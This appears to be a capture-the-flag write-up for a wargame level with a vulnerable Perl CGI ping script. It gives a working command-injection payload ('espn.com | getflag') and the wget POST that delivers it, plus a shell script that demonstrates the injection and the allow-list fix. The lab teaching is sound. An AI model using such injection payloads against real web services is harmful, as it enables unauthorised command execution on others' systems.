### Level 07

#### Introduction

This level features the Perl CGI script below, which is hosted by a web server:

```perl
#!/usr/bin/perl

use CGI qw{param};

print "Content-type: text/html\n\n";

sub ping {
  $host = $_[0];

  print("<html><head><title>Ping results</title></head><body><pre>");

  # Backticks hand this whole string to /bin/sh with $host interpolated
  # unescaped, so shell metacharacters in the Host parameter become commands.
  @output = `ping -c 3 $host 2>&1`;
  foreach $line (@output) { print "$line"; }

  print("</pre></body></html>");
}

# check if Host set. if not, display normal page, etc

ping(param("Host"));
```

#### Exploit

I don't really know Perl, but this looks similar to a SQL injection attack: it is a command injection. `ping -c 3 $host 2>&1` is run through the shell with the `Host` parameter interpolated unescaped, so passing a `Host` value such as `www.espn.com | getflag` makes the shell run `ping` against espn.com and pipe its output into `getflag`, which is then executed as whatever user the script runs as.

I tried running `perl index.cgi Host="espn.com | getflag"` in the directory `/home/flag07`, but invoked that way the script still runs as my own user, so `getflag` fails. If the same parameter is POSTed to the web server that hosts the script, it runs as the user the web server runs as.

The config file for this web server shows it listening on port 7007, so the `wget` utility can POST to it: `wget localhost:7007/index.cgi --post-data="Host=espn.com | getflag"`. Note that `wget` writes the response to a file named `index.cgi` in the current directory; add `-O -` to print it to the terminal instead.
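The following POSIX shell script is an added example for this writeup, not the level's own code or the original author's. It reproduces the injection offline by running the interpolated string through `sh -c` the way Perl backticks do (with `echo` standing in for `ping`), percent-encodes the payload for a POST body, and shows the allow-list check that would have closed the hole. The hostnames and payloads are constructed for illustration.

```shell
#!/bin/sh
# Added example for this writeup (not the level's own code or the original
# author's). Hostnames and payloads below are constructed for illustration.

# Mimic Perl's `ping -c 3 $host 2>&1`: backticks pass the whole string to
# /bin/sh -c, so $host is interpolated before the shell parses it. "echo"
# stands in for ping so this runs without network access.
run_like_backticks() {
    sh -c "echo ping -c 3 $1 2>&1"
}

# Percent-encode one argument for an application/x-www-form-urlencoded body.
# Unreserved characters (RFC 3986) pass through; everything else becomes %XX.
urlencode() {
    s=$1
    out=""
    while [ -n "$s" ]; do
        c=${s%"${s#?}"}        # first character of $s
        s=${s#?}               # drop it
        case $c in
            [A-Za-z0-9._~-]) out="$out$c" ;;
            *) out="$out$(printf '%%%02X' "'$c")" ;;   # "'c" yields the byte value
        esac
    done
    printf '%s' "$out"
}

# The body to send with `wget --post-data` or `curl --data`.
post_body() {
    printf 'Host=%s' "$(urlencode "$1")"
}

# The check the script lacks: accept only hostname characters before the
# value reaches a shell. (Using list-form system()/exec instead of backticks
# would avoid the shell entirely.)
validate_host() {
    case $1 in
        "")                 return 1 ;;
        *[!A-Za-z0-9.-]*)   return 1 ;;
        *)                  return 0 ;;
    esac
}

# Usage: the injected pipe splits the command. Note that 2>&1 now applies to
# the injected command, exactly as it would to getflag on the target.
run_like_backticks 'espn.com | tr a-z A-Z'
post_body 'espn.com | getflag'; echo
validate_host 'espn.com | getflag' || echo "rejected"
```

`run_like_backticks 'espn.com | tr a-z A-Z'` prints `PING -C 3 ESPN.COM`, which is the same split the target's shell performs on `ping -c 3 espn.com | getflag 2>&1`. `post_body` is for clients that would otherwise mangle the spaces; `wget --post-data` sends the body as typed, and `CGI.pm`'s `param` decodes `%XX` and `+` on the way in.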